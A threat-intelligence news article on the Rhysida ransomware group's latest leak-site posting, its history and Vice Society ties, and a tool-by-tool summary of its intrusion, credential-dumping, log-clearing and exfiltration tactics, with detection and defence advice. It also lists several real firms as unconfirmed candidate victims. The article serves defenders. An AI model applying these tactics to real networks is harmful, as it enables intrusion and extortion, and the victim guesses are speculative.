RHYSIDA Ransomware Strikes Again: 'Leading Edge Speciali' Added to Leak Site as Group's Relentless Campaign Continues
The notorious ransomware group with ties to Vice Society claims another victim as security experts warn of accelerating attacks into 2026.
In the early morning hours of February 6, 2026, the RHYSIDA ransomware group updated their dark web leak site with a new victim: an organization identified only as "Leading Edge Speciali." The posting, first detected by ThreatMon's ransomware monitoring service at 00:11 UTC+3, marks yet another attack in what has become a relentless campaign by one of the most active and dangerous ransomware operations currently targeting organizations worldwide.
The attack bears the hallmarks of RHYSIDA's signature double-extortion model—steal the data first, then encrypt the systems, then threaten to publish everything unless the ransom is paid. For organizations across healthcare, education, government, and manufacturing sectors, this latest incident serves as an urgent reminder that RHYSIDA shows no signs of slowing down as we move deeper into 2026.
What We Know About the Victim
The victim name "Leading Edge Speciali" appears to be truncated on the dark web posting—likely shortened from "Leading Edge Specialists," "Leading Edge Specialties," or a similar full corporate name. This truncation is common on ransomware leak sites, which often have character limits or display issues that obscure victim identities.
Our research efforts to definitively identify the victim have not yet yielded conclusive results. Several organizations operate under "Leading Edge" branding across various industries:
- Leading Edge Administrators — a healthcare benefits administrator
- Leading Edge Medical — orthopedic solutions provider
- Leading Edge Medical Associates — Texas-based emergency medicine group
- Leading Edge Healthcare Professionals — practice management services
- Leading Edge Security — Indiana-based security systems company
- Leading Edge Technologies — IT staffing firm based in Minneapolis
Given RHYSIDA's well-documented preference for healthcare targets, organizations in that sector should be on heightened alert. However, without an official statement from the victim or additional information from the leak site, we cannot confirm the specific organization or industry affected.
What we can confirm: the leak site posting indicates this is a data-leak event, meaning RHYSIDA has exfiltrated data and is threatening publication. No ransom figures have been publicly disclosed, though the group typically operates on a countdown timer that gives victims days—not weeks—to respond before sensitive data goes public.
We will update this article as more information becomes available.
The RHYSIDA Threat: A Deep Dive
Origins and Evolution
RHYSIDA first emerged on the ransomware scene in May 2023, taking its name from a genus of centipedes—a fitting choice for a group whose attacks move quickly and strike with precision. The group operates primarily as a Ransomware-as-a-Service (RaaS) platform, meaning they develop and maintain the ransomware infrastructure while recruiting affiliates to actually conduct the attacks. This model has proven devastatingly effective, allowing RHYSIDA to scale operations rapidly while maintaining plausible deniability about specific attacks.
Security researchers have traced the group's likely origins to the Commonwealth of Independent States (CIS) region, a common haven for ransomware operations due to lax enforcement against cybercriminals who target Western organizations.
The Vice Society Connection
Perhaps the most significant aspect of RHYSIDA's emergence is its documented connection to Vice Society, another notorious ransomware group that terrorized the education and healthcare sectors throughout 2022 and 2023. Multiple security research teams—including Check Point, Sophos, and PRODAFT—have confirmed strong operational ties between the two groups.
The evidence is compelling:
- Overlapping TTPs: The tactics, techniques, and procedures used by RHYSIDA operators closely mirror those employed by Vice Society.
- Shared Infrastructure: Some attacks have shown affiliates using both Vice Society and RHYSIDA ransomware payloads.
- Timing: Vice Society's relative disappearance from the scene corresponds directly with RHYSIDA's rise—suggesting a rebrand rather than a new group entirely.
- Target Selection: Both groups have historically focused heavily on healthcare and education, sectors known for sensitive data and often-underfunded security programs.
This connection matters because it means RHYSIDA isn't a newcomer learning the ropes—they're experienced operators who have simply adopted a new name and updated toolset. The group benefits from years of accumulated knowledge about what works, which targets pay, and how to evade detection.
The RaaS Business Model
RHYSIDA operates on the increasingly common Ransomware-as-a-Service model. Here's how it works:
- Core Developers: The RHYSIDA team maintains the ransomware code, payment infrastructure, leak site, and negotiation operations.
- Affiliate Recruitment: They recruit affiliates—other cybercriminals—who actually conduct the attacks.
- Revenue Sharing: Affiliates typically keep 70-80% of any ransom payments, with the remaining 20-30% going to the core RHYSIDA operation.
- Support Services: The core team provides technical support, negotiation handling, and leak site management.
This model means that RHYSIDA attacks can vary significantly in sophistication depending on which affiliate conducts them. Some affiliates are highly skilled nation-state-level operators; others are relative novices. What unites them is access to RHYSIDA's proven toolkit and infrastructure.
The 2025-2026 Attack Pattern: No Sector Is Safe
RHYSIDA has been extraordinarily active over the past year, claiming victims across virtually every sector. The pattern reveals both opportunistic targeting and deliberate focus on high-value organizations.
Healthcare Under Siege
Healthcare remains RHYSIDA's primary hunting ground. Recent victims include:
- Sunflower Medical Group (2025) — 220,968 individuals affected
- MedStar Health (Maryland, 2025) — major healthcare system
- Florida Hand Center (2025) — medical records, insurance forms, and IDs exposed
- St. Joseph's Healthcare Hamilton (2025) — Canadian healthcare
- Spindletop Center (Texas, 2025) — behavioral healthcare provider
- Cytek Biosciences (2026) — healthcare/life sciences
- Invacare — medical equipment manufacturer
The healthcare sector presents an irresistible target for ransomware groups. Protected Health Information (PHI) is extraordinarily valuable on underground markets. Critical patient care operations mean victims face life-or-death pressure to pay and restore systems quickly. HIPAA regulations add additional compliance pressure and potential liability. And frankly, many healthcare organizations have historically underfunded their cybersecurity programs relative to the sensitivity of the data they hold.
Government and Critical Infrastructure
RHYSIDA has shown no hesitation in attacking government entities and critical infrastructure:
- City of Columbus, Ohio (2024) — Over 500,000 individuals affected, 3TB of data released, $1.7 million ransom demand (30 BTC)
- Seattle-Tacoma International Airport (2024) — Critical transportation infrastructure
- Maryland Department of Transportation (2025) — State government agency
- Government of Peru — National government target
These attacks demonstrate RHYSIDA's willingness to take on high-profile targets despite the increased law enforcement attention such attacks generate.
Education Sector Carnage
Following the Vice Society playbook, RHYSIDA continues to target educational institutions:
- Rutherford County Schools (Tennessee, 2024) — Student data compromised
- Pembina Trails School Division (2024) — $1.6 million ransom demand for student data
- Ranney School (2024)
- Wachusett School District (2025)
- Collège Supérieur de Montreal (2025-2026)
- Multiple universities across North America and Europe
Schools and universities often have distributed IT environments, limited security budgets, and extremely sensitive student data—making them prime targets.
Other Notable Victims
RHYSIDA's reach extends across virtually every industry:
- Insomniac Games (Sony, 2023) — Over 1TB leaked, including unreleased Marvel's Wolverine game details
- British Library (2023) — Major cultural institution
- Chilean Army (2023) — Military data breach
- CNPC USA (China National Petroleum affiliate) — Energy sector
- Elabs (Germany, 2026) — IT services
How RHYSIDA Operates: Technical Analysis
Understanding RHYSIDA's methods is essential for defense. Based on the April 2025 update to CISA Advisory AA23-319A and recent research from At-Bay and other security firms, here's how these attacks typically unfold.
Initial Access: The Entry Points
RHYSIDA affiliates gain initial access through several proven methods:
Compromised VPN Credentials: This remains the most common entry vector. Affiliates obtain valid VPN credentials through credential stuffing, dark web purchases, or phishing. Organizations without multi-factor authentication on VPN are especially vulnerable.
Gootloader Malware: Added to RHYSIDA's arsenal in 2025, Gootloader is delivered through SEO poisoning—malicious websites that rank highly for specific search terms and trick users into downloading trojanized software.
SEO Poisoning with Trojanized Downloads: Users searching for legitimate software like PuTTY find malicious downloads that install backdoors alongside (or instead of) the expected application.
Phishing Campaigns: Classic social engineering to harvest credentials or deliver initial payloads.
Unpatched External Systems: Exploiting known vulnerabilities in VPNs, email gateways, and other internet-facing systems.
Living Off the Land
Once inside, RHYSIDA affiliates prefer using built-in Windows tools to avoid detection:
- Remote Desktop Protocol (RDP) for lateral movement between systems
- PowerShell for script execution
- Native Windows commands: ipconfig, whoami, nltest, net commands for reconnaissance
- PsExec for remote command execution
The Toolbox
RHYSIDA affiliates deploy a range of commercial and open-source tools:
| Tool | Purpose |
|---|---|
| Cobalt Strike | Post-exploitation framework for command and control |
| PsExec | Remote execution across the network |
| AnyDesk | Remote access and persistence |
| secretsdump | Credential extraction from memory and files |
| ntdsutil.exe | Dumping Active Directory database |
| PowerView | Domain reconnaissance |
| Advanced Port Scanner | Network enumeration |
| AZCopy | Azure storage exfiltration |
| StorageExplorer | Cloud storage access |
The 2025 addition of AZCopy and StorageExplorer reflects a significant evolution in RHYSIDA's tactics. Rather than exfiltrating data to attacker-controlled infrastructure, affiliates are increasingly using legitimate cloud storage services—making detection far more difficult. In one observed case, attackers transferred over 100,000 files to Azure storage before detonating ransomware.
Covering Their Tracks
At-Bay's November 2025 research revealed sophisticated evasion scripts used by RHYSIDA affiliates:
Security Service Termination: Scripts that systematically disable and stop security-related services including SQL, Oracle, Exchange, Veeam backup, Malwarebytes, and Hyper-V services.
Process Killing: Targeted termination of security agents, backup tools, remote management software, antivirus processes, and database services.
Defensive Modifications: Adding Windows Defender exclusions for executable files, modifying registry settings, and clearing Windows event logs across System, Application, and Security categories.
Network Operations: Wake-on-LAN packets to bring offline systems online for encryption, and SMB share staging for tool deployment.
The Encryption Phase
When RHYSIDA deploys its ransomware:
- Files are encrypted using a hybrid RSA + ChaCha20 algorithm
- Encrypted files receive the
.rhysidaextension - A ransom note titled
CriticalBreachDetected.pdfis dropped - Volume Shadow Copies are deleted to prevent easy recovery
- Victims receive instructions to access a TOR-based payment portal with a unique identifier
Impact and Risk Assessment
The consequences of a RHYSIDA attack extend far beyond the immediate encryption event.
Operational Impact
Organizations face significant downtime as systems are encrypted and taken offline. For healthcare organizations, this can mean canceled procedures, diverted ambulances, and delayed care. For businesses, it means halted operations, missed deadlines, and broken supply chains.
Data Breach Consequences
The double-extortion model means data is exfiltrated before encryption. Victims face:
- Regulatory Penalties: HIPAA violations for healthcare, state breach notification requirements, potential GDPR fines for organizations with EU data subjects
- Litigation Risk: Class action lawsuits from affected individuals are increasingly common following ransomware attacks
- Competitive Damage: Stolen intellectual property, trade secrets, and business communications may end up in competitors' hands or on public forums
Financial Toll
The costs compound rapidly:
- Ransom Demands: RHYSIDA demands have ranged from hundreds of thousands to millions of dollars
- Recovery Costs: Incident response, forensics, system rebuilding, and security improvements
- Business Interruption: Lost revenue during downtime
- Legal and Regulatory: Attorney fees, potential fines, notification costs
- Long-term: Increased insurance premiums, reputation repair
Reputational Damage
Perhaps the most lasting impact is to organizational reputation. Customers, patients, partners, and the public lose trust. For healthcare organizations especially, that trust is the foundation of the care relationship.
What Organizations Should Do NOW
Whether your organization is in RHYSIDA's crosshairs or not, the time to act is before the attack—not after. Here are priority actions based on CISA guidance and observed RHYSIDA tactics.
Immediate Priorities
1. Enable Multi-Factor Authentication Everywhere
MFA on VPN, email, and all critical systems would prevent the majority of RHYSIDA attacks at the initial access stage. This is the single highest-impact control you can implement.
2. Patch Known Exploited Vulnerabilities
Review CISA's Known Exploited Vulnerabilities (KEV) catalog and prioritize patching any systems on that list. External-facing systems—VPNs, email gateways, web servers—should be first priority.
3. Segment Your Networks
Network segmentation limits lateral movement. Even if attackers breach one segment, they shouldn't have free rein across the entire environment.
4. Disable Unnecessary Remote Services
Audit and disable RDP, WMI, SMB, and other remote services where not required. Where required, restrict access to authorized users and systems only.
Detection and Monitoring
5. Monitor for Security Tool Tampering
Alert on Windows Defender being disabled or modified, security service termination, and attempts to add Defender exclusions.
6. Watch for Log Clearing
RHYSIDA affiliates routinely clear event logs to cover tracks. Alert on wevtutil.exe usage and gaps in log continuity.
7. Track Administrative Tool Usage
Unusual PsExec, RDP, or PowerShell activity—especially across multiple systems—may indicate lateral movement.
8. Monitor Cloud Egress
Watch for AZCopy, Azure Storage Explorer, or large data transfers to cloud storage services.
9. Protect Active Directory
Alert on NTDS.dit access attempts and unusual ntdsutil.exe usage.
Backup and Recovery
10. Maintain Offline Backups
Backups connected to your network will be encrypted or deleted. Maintain air-gapped backups that cannot be reached by ransomware.
11. Test Restoration Procedures
Backups are worthless if they don't restore. Regularly test your ability to recover critical systems from backup.
12. Plan for Domain Compromise
If NTDS.dit compromise is suspected, you'll need a domain-wide password reset plus a double Kerberos TGT password reset. Have this procedure documented and ready.
Resources
- CISA Advisory AA23-319A (Updated April 2025): https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a
- HHS RHYSIDA Sector Alert: https://www.hhs.gov/sites/default/files/rhysida-ransomware-sector-alert-tlpclear.pdf
Looking Ahead: The Ransomware Landscape in 2026
RHYSIDA's continued activity into 2026 reflects the persistent, evolving nature of the ransomware threat. Despite law enforcement actions against other groups, despite improved defenses at many organizations, despite increased awareness—the ransomware economy continues to thrive.
The Vice Society-to-RHYSIDA evolution demonstrates how these groups adapt. When one brand becomes too hot, operators simply rebrand and continue operations. The underlying criminal ecosystem—the affiliates, the money launderers, the initial access brokers, the malware developers—persists through these transitions.
For defenders, this means the threat is perpetual. There is no "winning" against ransomware in a permanent sense. Instead, organizations must maintain continuous vigilance, assume breach as a planning scenario, and ensure they have the detection capabilities and backup infrastructure to survive an attack when—not if—it comes.
The addition of "Leading Edge Speciali" to RHYSIDA's leak site is a reminder that these attacks happen daily. Most never make headlines. Most victims quietly negotiate, pay, or rebuild. But each attack represents real harm to real organizations and the people they serve.
This is a developing story. We will update this article as more information about the victim and attack becomes available.
If you have information about this incident or RHYSIDA's operations, contact us securely through our tip line.
